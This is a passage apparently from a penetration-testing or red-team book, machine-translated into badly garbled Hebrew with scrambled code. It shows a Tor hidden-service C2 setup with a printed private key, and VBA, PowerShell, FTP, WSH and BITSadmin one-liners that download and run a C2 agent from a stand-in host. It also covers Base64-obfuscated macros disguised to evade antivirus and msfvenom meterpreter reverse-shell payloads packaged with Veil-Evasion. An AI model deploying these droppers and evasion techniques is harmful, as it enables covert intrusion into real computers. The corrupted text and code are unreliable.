‫ שים ל ב‬.‫מפת חותיאו ח סנו וצרי כים להיות מ חוץ ל ספריית ה שור ש ש ל שרת האינ טרנ ט‬
‫זה פ שו ט כדי‬4433. ‫ פוע ל למע שה ע ל‬443, ‫ תוך ח שיפתיציאה‬,‫ש שרת האינ טרנ ט‬
.‫למנוע את הצורך להפעי ל את שירות האינ טרנ ט כ שור ש‬
‫ה ק בצים הא לה‬tor_hidden . ‫ייווצרו שני ק בצים ב ספרייה‬,‫יופע ל‬roT-‫בפעם ה באה ש‬
(‫ ש לך‬2C-‫) שמור ע ל זה מאו ב ט ח או שא חריםיו כ לו להת חזות ל‬private_key ‫הם קו בץ‬
2C-‫ זו תהיה גם ה כתו בת ש ל ה‬.‫ ש ל המפת ח הצי בורי‬hash ‫ו קו בץ שם מאר ח שמ כי ל‬
:‫ש לך‬
‫הפע ל מ חד ש‬wil@c2:~$ etcinit.d/tor
wil@c2:~$ ls
‫שם מאר ח‬
‫פר טי_מפת ח‬
‫ חתו ל פר טי_מפת ח‬wil@c2:~$
-----‫ פר טי‬RSA ‫הת ח ל מפת ח‬-----

MIICXAIBAAKBgQC9ymfMgQk12AFT4PXWV+XfmZ1tVDaGajya/jIuwnwtjFdMWe7m
VDWMjs8Z02GGJhH6tIIpoDUrWLi+YchNHlQBi2AnBFzAoSlfRcvobeBAaWuQn+aH
Uzr+xVXOADSIcfgtT5Yd13RKmUEKFV8AO9u652zYP1ss0l+S2mY/J/t/3wIDAQAB
Lql1vPfM1l ps67Qs4tAEXYyraVaAcFrSCwp6MyeKYwxZtT7ki7q3rb4kvuGyx
AoGAMjQwcPBRN2UENOP1I9XsgNFpy1nTcor3rShArg3UO1g8X34Kq/
qhBVWeZD7amfvPYChQo0B4ACZZdJlcUd/x1JSOYbVKvRCvJLxjT
BrpXEiK0j2QcrjC/dMJ9400G4V4A90G00DV4V4A00G0D4V4A9A00G4VVA
v3yzQSYslOehVWMTH7xTzaOvp5uhpAlHFRqN5MECQQDmpFkXmtfEGwqT brRbKegRs9siNY6McWBCGrYc/
5LMwg93jj2m386jXWx8n40Zcus6BTDr6YwJBAKH8E0ZszdVBWLAqEbOq9qjAuiHz
mEoMCQBaM91yvrfp7N9BeDMCHlSDfAzX7sDqQn44ftHvZZI9V
bPc2uLgUM8MfHj7h8z+6G4hAQODmaZHVaDK8XzL59gyqom9eflgcOM9e9mmg8x8xzL59gyqom9e9mm
NH+XqiOshCxTwVOdvRorCxjJjhspGdvyl/PJY5facuShuhgI13AlJ+KpMvECQHDJ
4IouuRuLlqN0iaw4V73v3MUeqXoasmdeZ89bVGhVrC8=
-----‫ פר טי‬RSA ‫ סוף מפת ח‬-----
‫ שם מאר ח חתו ל‬wil@c2:~$
4y8jey307n3du4i.onion
‫ ניתן לג שת א ליו ע לידי‬,‫ באמצעות תצורה זו‬Tor ‫ פעי ל ומ סופ ק דרך ר שת‬2C-‫כא שר ה‬
‫ בתנאי‬4y8jey307n3du4i.onion, ‫ ב כ ל מ קום בעו לם באמצעות ה כתו בת‬C2 ‫סו כני‬
‫ כדאי ל חזור ע ל הנ קודה ש ברגע שהת שתית‬.‫ בעצמם‬Tor ‫שה סו כניםי כו לים לג שת לר שת‬
‫ ה סו כנים לא‬.‫צדדית‬-‫י ש אנונימיות מו ח ל טת ש ל תע בורה דו‬,‫הזו פוע לת‬
‫יודע לאן הם מת ח ברים ו שרת ‪ C2‬לאי כו ל לראות את מי קומם ש ל ה סו כנים‪ .‬זה מ ק שה‬
‫מאוד ע ליעדים לזהות ו ל ח סום תע בורת ‪ C2‬ו ב לתי אפ שרי לג לות הי כן נמצא שרת ‪C2‬‬
‫ש לנו‪.‬‬
‫הגדרת סו כן ‪ C2‬ל שימו ש בר שת ‪Tor‬‬

‫לא חר ש שרת ‪ C2‬מוגדר ל ק ב ל חי בורים דרך ‪Tor,‬ה ש ל ב ה בא הוא לאפ שר ל סו כני ‪C2‬‬
‫הפרו סים ע ל מ ח ש בים שנפרצו לע שות זאת‪ .‬הדרך ה ק לה ביותר לע שות זאת היא לאגד‬
‫אתיי שום שורת הפ קודה ‪ tor.exe‬עם ה סו כן ופ שו ט להפעי ל אותו ל לא פרמ טרים‪ .‬זה‬
‫יגרום לו לפעו ל ב ח לון נ סתר ו לפתו חיציאת פרו ק סי ‪ -localhost 9050.‬ב ‪SOCKS‬אני‬
‫מציע ל שנות את ה שם ת חי לה כך שהוא לאייראה מיד בר שימת תה ליך ‪-Window.‬ה‬
‫מנ קודת מ ב ט ש ל קוד‪,‬י ש ל בצע את ה שינויים ה באים‪:‬‬

‫שנה את כתו בות ה‪ PI-‬ש ל מנהור ‪ SSH‬מ כתו בות ‪-IPv4‬ה ש ל האינ טרנ ט בתוך‬
‫ה קוד כך שיצ ביעו ע ל כתו בת ה‪ noino.-‬שהוז כרה קודם ל כן‪.‬‬
‫אמור ל‪ Proxy SSH SOCKS -‬לה קדים את ‪-Proxy‬ה ש ל ‪ -TCP 9050,‬ב ‪Tor SOCKS‬‬
‫כפי שניתן לראות באיור ‪5.5.‬‬
‫איור ‪ 5.5:‬טופו לוגיה סמויה ‪ C2‬פ שו טה‪.‬‬
‫הערה‬
‫מנהור נתונים דרך ‪ Tor‬פירו שו פגיעה ב ביצועים; האופי ש ל אופן פעו לתו ש ל ‪Tor‬‬
‫אומר שזה תמידיהיה המצ ב‪ ,‬לא מ שנה כמה מהר ה קי שורים ה בודדים או‬
‫ה ביצועים הג בוהים ש ל צמתי הניתו ב‪ Tor .‬מנוצ ל טו ביותר כפתרון ‪C2‬אנונימי‬
‫נמוך ואי טי כא שר אינך צריך להע ביר כמויות אדירות ש ל נתונים‪ .‬עם זאת‪ ,‬זהו‬
‫פתרון א לגנ טי מאוד ל בעיות אנונימיות‪.‬‬
‫ג שרים‬
‫ר שתות מ סוימות ע שויות ל ח סום את היציאה ש ליציאת ‪TCP 9050‬או אפי לו לר שום‬
‫באופן דינמי את כ ל צמתי ה‪ roT-‬בני סיון למנוע מהמ שתמ שים ש להם גי שה לר שת ‪Tor‬‬
‫ו לע קוף את ב קרת הגי שה לר שת; עם זאת‪ ,‬ניתן לה בי ס זאת ב ק לות ע לידי הודעה ל סו כן‬
‫‪ C2‬לה שתמ ש בג שרי ‪ Tor‬בעת ה חי בור‪ .‬זה מו שג ע לידי הו ספת האפ שרויות ה באות‬
‫ל קו בץ התצורה המ קומי ש ל ‪torrc .‬‬
‫ניתן ל טפ ל בגי שור גם כאופציה ב שורת הפ קודה‪ ,‬א ב ל לפרי סה רא שונית‪ ,‬אני רוצה‬
‫לוודא שי ש לי ג שרים עו בדים מ לפנים ו לתת ל סו כן ‪ Tor‬ל טפ ל ב ספרייה ש לו ברגע שהוא‬
‫מ חו בר‪ .‬התנ סו ותהנו‪.‬‬
‫‪1E326AAFB3FCB5150152503D8BFC9E1E326AAFB3FCB5150152503D8BFC9E8B1FCC9E1A5D3FCC9E‬‬
‫‪0E858AC201BF0F3FA3C462F64844CBFFC7297A42 Bridge fte 128.105.214.161:8080‬‬
‫‪2BD466989944867075EBAD1BC1BC1BC1Ffte 1BC175E87232BC1 0.150:8080‬‬
‫‪FC562097E1951DCC41B7D7F324D88157119BB56D Bridge fte 50.7.176.114:80‬‬
‫‪.105.214.162:8080‬‬
‫‪FDC5BA65D93B6BCA5EFF1EFF1EB7EF4EF17EB7EFF1EF17EB7EFF1EFF1EF1F3EF17EF17EF4‬‬
‫‪A17A40775FBD2CA1184BF80BFC330A77ECF9D0E9 Bridge fte 192.240.101.106:80‬‬
‫‪Bridge fte 128.105.214.163:8080‬‬
‫א ס טר טגיות חד שות בהתגנ בות ופרי סה‬

‫אתה בערך באמצע ה ספר כ בד המ ש ק ל הזה‪ ,‬אז זה נראה כמו זמן טו ב לע שות ח ש בון‬
‫נפ ש‪ ,‬לעיין מ חד ש ו ל שפר נו שאים קודמים תוך נגיעה ב חומר חד ש ומ שופר‪.‬‬
‫‪ VBA Redux:‬ו ק טורי ת קיפה ח לופיים ש ל שורת פ קודה‬
‫פ קודות מא קרו ‪VBA‬נ ב חנו בפר ק ‪ 1‬כאמצעי לא ספ קת מ טענים ואני רוצה ל חזור ע ל‬
‫ה ט כנו לוגיה הזו‪ ,‬מ כיוון שי ש דר כים א חרות ) טו בותיותר( לה שתמ ש בהן‪.‬‬
‫המא קרו ‪VBA‬הוא גם דרך המ ח שה מאוד להדגים ט כני קות א חרות ש ל די בור עם פי קוד‬
‫ו ב קרה והורדה ו ביצוע ש ל ש ל ב שני באמצעות פ קודה א חת ב ל בד‪.‬י ש גם דר כים טו בות‬
‫יותר להע ביר את מ סמך ‪-Word‬ה שהת ק ב ל מא שר דואר א ל ק טרוני‪ .‬באופן כ ל לי‪ ,‬מ סמך‬
‫‪MS Word‬הנו שא מא קרו דור ש סיומת ‪ mcod.‬א שר‪ ,‬ל לא ק שר ל שא לה אם אתה‬
‫מצ לי ח להע ביר אותו מע בר לזיהוי אנ טי‪-‬וירו ס או תו כנות זדוניות‪ ,‬עדיין ניתן לזהות ע ל‬
‫ידי בני אדם ומ כונות כא חד כוו ק טור הת קפה אפ שרי לפני שזה ב כ ל ל‪ .‬הורד‪ .‬הדואר‬
‫הא ל ק טרוניי סיר לעתים קרו בות ק בצים מצורפים כא לה כ ברירת מ חד ל‪ ,‬או לי‬
‫לה סגר אותם‪ ,‬ו כמע ט בוודאות להזהיר את מ שתמ ש ה קצה‪ .‬עוד ע ל זה ב‪a-‬‬
‫ֶר ַג ע‪.‬‬
‫בע בר‪ ,‬התר כזתי ב שימו ש בפ קודות מא קרו ש ל ‪ VBA‬כדי להוריד עומ ס ‪ VBS,‬ש בתורויוריד‬
‫קו בץ הפע לה ש ל סו כן ‪C2.‬זהיע בוד ומאפ שר גמי שות ר בה במה שאתהי כו ל לע שות ברגע‬
‫שאתה מ חוץ להג ב לות ש ל מוד ל ‪ VBA.‬עם זאת‪ ,‬רמת מור כ בות זו לא תמיד ה כר חית או‬
‫רצויה‪ .‬אם כ ל מה שאתה רוצה לע שות הוא להוריד ו להפעי ל סו כן ‪C2,‬אתהי כו ל לע שות‬
‫זאת ) בדר כים שונות( עם פ קודת ‪Windows‬א חת‪ .‬כא שר ט כני קות א לו מעורפ לות כה ל כה‪,‬‬
‫הןיעי לות וא טומות לאנ טי‪-‬וירו ס כמו כ ל ד בר שנראה עד כה‪.‬‬
‫פגז כו ח‬
‫אתהי כו ל לה שתמ ש ב שפת ס קריפ טים מ ש ל ‪ Windows, PowerShell,‬ע בור כ ל מיני‬
‫מ שימות לא חר ניצו ל‪ .‬אין לו את הת ח ביר והמ בנה הא לגנ טיים ביותר בה שוואה למה‬
‫שתתרג ל א ליו כמ שתמ ש ‪UNIX,‬א ב ל הואיותר מעוצמתי מ ספי ק לצר כים ש לנו‪ .‬ה קוד ה בא‬
‫במא קרו ‪VBA‬יוריד את קו בץ ‪ agentc2.exe‬מ‪http://ourc2server.com, -‬יא ח סן אותו‬
‫בתור ‪ agent.exe‬ב ספריית הע בודה וי בצע אותו‪:‬‬
‫)(‪Sub powershell‬‬
‫'‬
‫' מא קרו ש ל ‪Powershell‬‬
‫'‬
‫'‬
‫עמום ‪ PSResponse‬כמ חרוזת‬
‫)‪ourc2server.com/download/c2agent.ex Process 'agent.exe'", vbHide‬‬

‫‪PSResponse = Shell("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://‬‬
‫שימו ל ב לאפ שרות ‪ vbHide‬בתוך הפ קודה ‪Shell .‬זה מ ב טי ח שה ביצוע מו סתר‬

‫מהמ שתמ שים ) לפ חות במו בן שהם לאיראו ח לון פ קודה(‪.‬‬
‫‪FTP‬‬
‫ע בור רו ב המ שימות‪FTP ,‬הוא פתרון הע ברת ק בצים שהוצא מ שימו ש‪ .‬זה מגו שם ו לא‬
‫ב טו ח‪ ,‬א ב ל עדייןי ש לו שימו שים‪ .‬ה קוד ה בא )הפעם לא מוצג בה ק שר ש ל מא קרו )‪VBA‬‬
‫י שיג את אותו אפ ק ט ע לידי בניית ת חי לה ‪an‬‬
‫י שיג את אותו אפ ק ט ע לידי בניית ת חי לה‬VBA) ‫הה ק שר ש ל מא קרו‬

:‫הה באות‬-FTP ‫ ל ביצוע פ קודות‬FTP ‫ס קריפ ט‬
:‫יציאה ו לא חר מ כן ביצוע ה סו כן עצמו‬c2agent.exe ‫ בינארי ק ב ל את‬ourc2server.com ‫פת ח את‬
@echo &txt.tpircs<<‫ בינארי‬ourc2server.com>script.txt&@echo ‫ פת ח‬cmd.exe c "@echo

quit>>script.txt&@ftp - s:scrip t .txt -v -A&@start c2agent.exe"/ ‫ק ב ל‬
c2agent.exe>>script.txt&@echo
Windows (WSH) ‫מאר ח ס קריפ טים ש ל‬

‫הי כו ל ל שמ ש גם כדי להוריד ו להפעי ל קוד כ שורה פ קודה א חת אם אתה נו טה‬-WSH
:‫ זה מ חיי ב ת חי לה ל בנות קו בץ ס קריפ ט‬,‫ בדומה לדוגמה ה קודמת‬.‫כ ל כך‬
"http://ourc2server/downloads/c2agent.exe" strHDLocation = "agent.exe"

strFileURL =
objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() ‫הגדר‬
objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
Set objShell = CreateObject("WScript.Shell") objShell.Exec("agent.exe")

objADCream. jADOStream = Nothing End if Set objXMLHTTP = Nothing
objADOStream objADOStream objADOStream objADCream objADCream
objADOStream.Position = 0SDOStream objADOStream
objADOStream.Type = 1 objADOStream.Write objXMLHTTP.ResponseBody
objADOStream = CreateObject("ADODB.Stream") objADOStream.Open
If objXMLHTTP.Status = 200 Then Set
:‫ שורת הפ קודה שהו ש למה היא כד ל קמן‬cscript.exe. ‫והפע ל אותו באמצעות‬

downloads/c2agent.exe",false>>poc. vbs &@echo objXMLHTTP.send()>>poc.vbs
&@echo objXMLHTTP.open "GET","http:/ourc2server/
cmd.exe c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
‫‪&@echo If objXMLHTTP.Status=200‬אז<<‪&@echo sbv.cop‬הגדר "‪poc.vbs‬‬

‫‪&@echo objShell.Exec("agent.exe")>>poc.vbs&cscript.exe‬‬
‫‪&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs‬‬
‫‪&@echo End if>>poc.vbs &@echo Set objXMLHTTP=Nothing>>poc.vbs‬‬
‫‪objADOStream.Close>>poc.vbs &@echo Set objADOStream=Nothing>>poc.vbs‬‬
‫‪>>poc.vbs &@echo objADOStream.SaveToFile "agent.exe">>poc. vbs &@echo‬‬
‫‪objXMLHTTP.ResponseBody>>poc.vbs &@echo objADOStream.Position=0‬‬
‫‪&@echo objADOStream. Type=1 >>poc.vbs &@echo objADOStream.Write‬‬
‫‪&@echo objADOStream.Open>>poc.vbs‬‬
‫‪objADOStream=CreateObject("ADODB.Stream")>>poc.vbs‬‬
‫‪BITSadmin‬‬
‫‪ Windows 7‬ומע לה מגיע עם כ לי שורת פ קודה ב שם ‪ BITSadmin,‬שניתן לה שתמ ש‬
‫בו גם להורדה ו ביצוע ש ל קוד‪ .‬ראוי להז כיר כ לי זה‪ ,‬מ כיוון שהוא מ סוג ל לה שהות הע ברת‬
‫ק בצים אם ה חי בור לר שת א בד‪.‬‬
‫כא שר ה קי שוריות מ שו חזרת‪ ,‬ההע ברה תימ שך וה קודי בוצע‪.‬‬
‫‪cmd.exe c "bitsadmin transfer myjob‬הורדה עדיפות ג בוהה "‪\agent.exe&start agent.exe‬‬

‫‪http://ourc2server.com/download/c2agent.exe c:‬‬
‫ערפו ל מ טען פ שו ט ט כני קות א לו‪ ,‬למרות שהןיעי לות‪ ,‬הן ש קופות ל כ ל מי‬
‫שצופה במא קרו ומ כי לות מי לות מפת ח שאנ טי‪-‬וירו ס ע שוי למצוא ח שודות‪.‬‬
‫עם זאת‪ ,‬ק ל ל ט ש ט ש את הפ קודות ה ל לו באמצעות שגרת קידוד ‪Base64‬‬
‫פ שו טה‪.‬‬
‫י שנם אמצעי ערפו ל א חרים ו חז קיםיותר‪ ,‬א ב ל זה מ ספי ק כדי לה בי ס כמע ט את כ ל‬
‫הצורות ש ל ניתו ח תו כנות זדוניות או טומ טיות‪.‬‬
‫ניתן לזהות‪ ,‬לפענ ח ו לנת ח מ חרוזות ‪ )Base64‬טריוויא ליות למע שה(‪ ,‬אך בעוד שנו כ חות‬
‫ש ל נתונים מ קודדים ע לו לה להג ביר בדרך כ ל ל את ח שד ‪-AV‬ה ש ל כ ל קו בץ נתון‪ ,‬א לא‬
‫אם כןי שנם גורמים א חרים התורמים‪ ,‬זה לאי ספי ק כדי ל ק ב ל זה מ סומן‪ .‬פעו לה זו‬
‫תיצור מ ספר ב לתי מת ק ב ל ע ל הדעת ש ל תוצאות שווא‪.‬‬
‫בהמ שך לדוגמא ש ל ‪ PowerShell‬בתוך ‪VBA,‬הד בר הרא שון שצריך לע שות הוא‬
‫ל קודד את מ חרוזת המ טען בתור ‪ Base64.‬כדי ל שמור את זה א ק טוא לי‪ ,‬אני מדגים‬
‫זאת עם ‪PowerShell:‬‬
‫נ‪ .‬ב‪> $b = [System.Text.Encoding]::UTF8.GetBytes("PowerShell (N ew-Object .‬‬

System.Net.WebClient).DownloadFile('http://ourc2server.com/download/c2
'agent.exe'") ‫'(;הת ח ל תה ליך‬exe.tnega','exe.tnega
> [System.Convert]::ToBase64String($b) .‫ ב‬.‫נ‬
UG93ZXJTaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKC
odHRwOi8vb3VyYzJzZXJ2ZXIuY29tL2Rvd25sb2FkL2MyYWdlbnQuZXhlJywnYWdlbnQuZXhlJyk7U
RhcnQtUHJvY2VzcyAnYWdlbnQuZXhlJw==
‫ והפ קודה‬$b ‫הפ קודה הרא שונה מ קצה את המ טען למ חרוזת בתים הנ קראת‬
.46esaB-‫ה שנייה ממירה אותו ל‬
:‫המ סוג ל לפענ ח מ חרוזת זו ו ל בצע אותה‬VBA ‫ה ש ל ב ה בא הוא ליצור מא קרו‬
‫אפ שרות מפור שת‬

clOneMask = 16515072 ‫ פר טי‬Const
clTwoMask = 258048 ‫ פר טי‬Const
clThreeMask = 4032 ‫ פר טי‬Const
Private Const clFourMask = 63 Private Const clHighMask = 16711680
Const clMidMask = 65280 ‫פר טי‬
clLowMask = 255 ‫ פר טי‬Const
cl2Exp18 = 262144 ‫ פר טי‬Const

Monkey Function Public (sString As String) As String
As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long

Dim bOut() As Byte, bIn()
lQuad As Long, iPad As Intal, lChar As Long, lPos As Long, sOut As String
Dim lPowers18(63) As Long,
lTemp As Long ‫עמום‬
vbNullString) sString = Replace(sString, vbLf, vbNullString)

sString = Replace(sString, vbCr,
lTemp = Len(sString) Mod 4

iPad = 2 ‫אז‬InStrRev(sString, "==") ‫אם‬
iPad = 1 ‫אז‬ElseIf InStrRev(sString, "=")
‫סוף אם‬
255 ‫ עד‬lTemp = 0 ‫ע בור‬

Case lTemp ‫ב חר‬
90 ‫ עד‬65 ‫מ קרה‬
bTrans(lTemp) = lTemp - 65
122 ‫ עד‬97 ‫תי ק‬
bTrans(lTemp) = lTemp - 71
57 ‫ עד‬48 ‫מ קרה‬
bTrans(lTemp) = lTemp + 4
43 ‫מ קרה‬
bTrans(lTemp) = 62
47 ‫מ קרה‬
bTrans(lTemp) = 63
‫סיום ב חירה‬
‫ה בא‬lTemp
lTemp cl2Exp6 lPowers12(lTemp) = lTemp cl2Exp12 lPowers18(lTemp) = lTemp cl2Exp18 ‫ עד‬lTemp = 0 ‫ע בור‬
63 lPowers6(lTemp) =
lTemp bIn = StrConv(sString, vbFromUnicode) ReDim bOut((((UBound(bIn) + 1) \ 4) 3) - 1) ‫ה בא‬
4 ‫ ש ל ב‬lChar = 0 ‫ ל‬-UBound(bIn) ‫ע בור‬

lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) +
_ lQuad =
lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar
+ 3))
= lTemp \ cl2Exp8 bOut(lPos + 2) = lQuad And clLowPos lPos
\ cl2Exp16 lTemp = lQuad And clMidMask bOut(lPos + 1)
lTemp = lQuad And clHighMask bOut(lPos) = lTemp
lChar ‫ה בא‬
sOut = StrConv(bOut, vbUnicode)

If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) monkey = sOut
‫סיום פונ קציה‬

‫תת )(‪testb64‬‬
‫'‬
‫' מא קרו ‪testb64‬‬
‫'‬
‫'‬
‫עמום ‪ PSResp‬כמ חרוזת‬
‫= ‪PSResp‬‬
‫‪Shell(monkey("UG93ZXJTaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93‬‬
‫‪odHRwOi8vb3VyYzJzZXJ2ZXIuY29tL2Rvd25sb2FkL2MyYWdlbnQuZXhlJywnYWdlbnQuZXhlJyk7U‬‬
‫)‪RhcnQtUHJvY2VzcyAnYWdlbnQuZXhlJw=="), vbHide‬‬
‫שימו ל ב שהפ קודה ‪ Shell‬קוראת כעת לפונ קציה ‪monkey ,‬א שר לו ק חת את המ חרוזת‬
‫‪ Base64‬כ ק ל ט‪ .‬למה קוף? כי ברור שזו לא פונ קציית פענו ח‪ .‬אם זה נ קרא ‪Base64Decode‬‬
‫) לדוגמה(‪-AV ,‬ה ע שוי להתפתות ל ב חון מ קרו ב‪.‬‬
‫א ס טר טגיות א ל טרנ טי ביות בהת חמ קות מאנ טי וירו ס אתה ב ט ח מ ק ב ל את הרו שם ע כ שיו‬
‫שאני נ חו ש באמת לה כריע את ה ח שי בות ש ל התמצאות ‪ -AV.‬ב ח שו ב לה בין שהד ברים הי חידים‬
‫‪ -AV‬ש טו ב להם הוא עצירת הת קפי וני לידועים ומ ב חני חדירה מעצ בנים‪ .‬ב כ ל הת קפת ‪APT,‬‬
‫כ ל ה כ לים צרי כים להיות מותאמים אי שית ו ל בדו ק מו ל הגנותידועות לפני פרי סה‪ ,‬מה שהופך‬
‫את נו שא ‪-AV‬ה למעורפ ל מ שהו‪ .‬עם זאת‪,‬י ש מ קרים ש בהם תרצה לה שתמ ש ב כ לים שנ כת בו‬
‫ע לידי א חרים מ טעמי נו חות או בג ל ל אי לוצי זמן‪ ,‬וזה קרי טי לה ב טי ח שהם לאיתג לו‪.‬‬
‫הדוגמה ה ברורה ביותר היא סו כני ‪ Metasploit‬שתרצה לפרו ס ע ל ‪ C2‬מ ש לך‪ .‬מ כיוון ש‪-‬‬
‫‪Metasploits‬ידועים ומו בנים הי ט ב ע לידי ספ קי ‪AV,‬י ש צורך לע שות קצת ע בודה נו ספת‬
‫כדי למנוע מהם להיות מזוהים‪.‬‬
‫פתרון נ חמד ל כך הוא ער כת ה כ לים ‪ Veil Evasion‬שנ כת בה ע לידי ‪ Harmj0y‬ו ח ברים; אתה‬
‫י כו ל לה שיג את זה כאן‪:‬‬
‫‪https://www.veil-framework.com/framework/veil-evasion/‬‬
‫אני נותן שתי דוגמאות כיצד לה שתמ ש ב‪Veil Evasion: -‬‬

‫לו ק ח קוד מע טפת מ שוריין מרא ש ומ שתמ ש בו ליצירת קו בץ הפע לה חז ק‪.‬‬

‫א ב ט חת קוד מע טפת לא מ שוריין עם הצפנת ‪ AES‬ליצירת קו בץ הפע לה מהידור‬
‫ש ל ‪Python.‬‬
‫ער כת ה כ לים מ סוג לת להר בהיותר מזה‪ .‬אם אתה קורא את ה ספר הזה ואינך מודע‬
‫להת חמ קות מצעיף‪ ,‬אתה חיי ב לעצמך ל בדו ק אותו‪.‬‬
‫בדוגמה הרא שונה‪ ,‬מ טען ‪ shellcode‬ע בור סו כן הת ק שרות חוזר ש ל ‪Meterpreter‬‬
‫כ בר נוצר באמצעות ‪ msfvenom‬ו שורת הפ קודה ה באה‪:‬‬
‫‪ # msfvenom -a x64 --‬פ ל טפורמה ‪LHOST=ourc2server.com EXITFUNC=none -o raw_shellcode‬‬
‫‪-p windows/x64/meterpreter_reverse_http -e x86/fnstenv_mov -i 5 -f raw LPORT=1234‬‬
‫‪Windows‬נמצא ‪1‬תואם תואם למ קודדים ‪ -tempting‬ב מ קודדים ‪5‬אי טרציות ש ל ‪x86/fnstenv_mov‬‬
‫‪x86/fnstenv_mov‬הצ לי חו עם מידה ‪1190492 (iteration=0) x86/fnstenv_mov‬הצ לי חו עם מידה‬
‫‪1190516 (iteration=1) x86/fnstenv_mov‬הצ לי ח עם מידה ‪sustenv_mov=0501 (fnv9054) eded‬‬
‫‪ x86/fnstenv_mov‬עם מידה ‪1190564 ( iteration=3) x86/fnstenv_mov‬הצ לי ח עם גוד ל‬
‫‪1190588 (iteration=4) x86/fnstenv_mov‬נ ב חר עם גוד ל סופי ‪ 1190588‬גוד ל מ טען‪ 1190588 :‬בתים‬
‫נ שמר כ‪raw_shellcode :‬‬
‫פעו לה זו תיצור מ ח בר ‪HTTP‬הפוך ש ל ‪ Windows‬באמצעות מ קודד ‪Dword XOR‬‬

‫‪ Fnstenv/mov‬באורך מ שתנה ‪.‬‬
‫זה מו כן כעת ל שימו ש ב‪ Veil, -‬כפי שמוצג באיור ‪5.6.‬‬

‫איור ‪ 5.6:‬מ סך נ חיתה ש ל ‪Veil-Evasion.‬‬

‫‪# ./Veil-Evasion.py‬‬
‫ה שתמ ש במ טען ‪ 41‬והגדר את האפ שרויות כפי שמוצג באיור ‪5.7.‬‬

‫איור ‪5.7:‬צעיף עם ער כת אפ שרויות‪.‬‬

‫ה ק לד ‪ gener‬ו במ סך ה בא ב חר באפ שרות —‪ 3‬קו בץ עם ‪ Shellcode (Raw).‬לא חר‬
‫מ כן הזן את שם ה קו בץ ש בו נ שמר הפ ל ט ) במ קרה זה‪ raw_shellcode). ,‬ראה איור‬
‫‪5.8.‬‬
‫איור ‪5.8: Veil‬י כו ל כעת ליצור קו בץ הפע לה ש ל ‪ Python‬מהו ל מ קוד המע טפת הגו למי‪.‬‬
‫ה קוד נוצר‪ ,‬כפי שמוצג באיור ‪5.9.‬‬
‫איור ‪ 5.9:‬קו בץ ההפע לה המהודר מו כן ל שימו ש‪.‬‬
‫הדוגמה ה קודמת מע ט מתו כננת‪ ,‬מ כיוון ש‪ Veil Evasion -‬מ סוג לת באופן ט בעי ליצור‬
‫הת ק שרויות מעורפ לות ש ל ‪Meterpreter‬הו כ חה ‪ -AV,‬לא ב ל רציתי להדגיםיצירת עומ סים‬
‫מ קוד מע טפת ש טו ח‪ ,‬מ כיוון שאו לי תרצו לה שתמ ש במ שהו א חר מ ל בד ‪Meterpreter.‬‬
‫האפ שרויות מרמזות ‪-‬תצ טרך להתנ סות בהגדרות כדי להפוך את המ טען ש לך ל ח שאי באמת‪.‬‬
‫ע בור הדוגמה ה שנייה‪ ,‬אנייוצר ‪ exe.‬א חר באמצעות פ חות אויותר אותם פרמ טרים‬
‫ש ל ‪msfvenom ,‬אך הפעם לא כו ל ל את ה קידוד‪:‬‬
‫‪-f raw LPORT=1234 LHOST=ourc2server.com EXITFUNC=none -o raw_shellcode‬‬

‫‪ # msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_http‬לא‬
‫צוינו מ קודד או תווים ח סרים‪ ,‬פ ל ט מ טען גו למי גוד ל מ טען‪119046: 119046 raw_shellcode :‬‬
‫הפעם ב‪Veil Evasion, -‬אני בו חר מ טען ‪aes_encrypt.‬‬

‫‪35 - python/shellcode_inject/‬‬
‫אם תמ שיך עם אותן אפ שרויות כמו בדוגמה הרא שונה‪ ,‬תראה מ שהו דומה לתמונה‬
‫‪5.10.‬‬
‫איור ‪ 5.10:‬שו ב‪ ,‬הוא מו כן ל שימו ש‪.‬‬

‫‪Lastveil.png‬‬
‫מי לה א חרונה ע ל ה כ לי הזה ואני א שאיר את הרעיון ש ל אנ טי וירו ס ל בד לזמן מה‪.‬‬

‫ת כונה נ חמדה מאוד ש ל ‪Veil Evasion‬היא ש ב כ ל פעם שהואיוצר מ טען‪ ,‬הוא מא ח סן‬
‫‪ hash SHA256‬ש ל ה‪ exe. -‬במ סד הנתונים ש לו‪ .‬זה מאפ שר לך בעתיד לדעת אם‬
‫מי שהו א חר הגי ש את המ טען ל‪ Total suriV-‬לניתו ח‪ ,‬וזה כמו בן בדרך כ ל ל לא ד בר טו ב‬
‫ע בור המ שימה ש לך‪.‬‬
‫ההת קפה‬
‫כפי שצוין מו קדםיותר בפר ק‪ ,‬עדיף לדעת בפירו ט ר ב ועם מ ח ש בה מו קדמת כ כ ל‬
‫האפ שר בדיו ק מה אתה מעוניין ל ק חת מר שת היעד לפני ת חי לת הת ק שרות‪ .‬זה נ שמע‬
‫מו בן מא ליו ‪ -‬ס כימות ש ל כ ליירייה ‪-‬א ב ל כ ל מה שידוע כרגע ע ל היעד הוא שהם‬
‫מייצרים כ לי נ ש ק ומו ש קעים מאוד ב ט כנו לוגיית ‪CNC.‬י שנן מ ספר סופי ש ל ט כנו לוגיות‬
‫‪ CAD‬שמתאימות לע בודה כזו ו שי כו לות לייצא עיצו בים התואמים למ כונות א לו‪ .‬לדעת‬
‫איזו ט כנו לוגיה )ו ל כן הר ח בות ק בצים ו כן ה לאה( נמצאת ב שימו ש מרא שי ח סוך לך זמן‬
‫בעת חיפו ש הת שתית לאיתור נתונים‪.‬‬
‫כא שר סור קים את הת שתית לאיתור נתונים‪.‬‬

‫זה לא כ ל כך ק שה כמו שזה נ שמע‪ .‬חיפו ש מהיר בגוג ל מע לה דף אינ טרנ ט‪ ,‬ו ק בורה בתוך‬
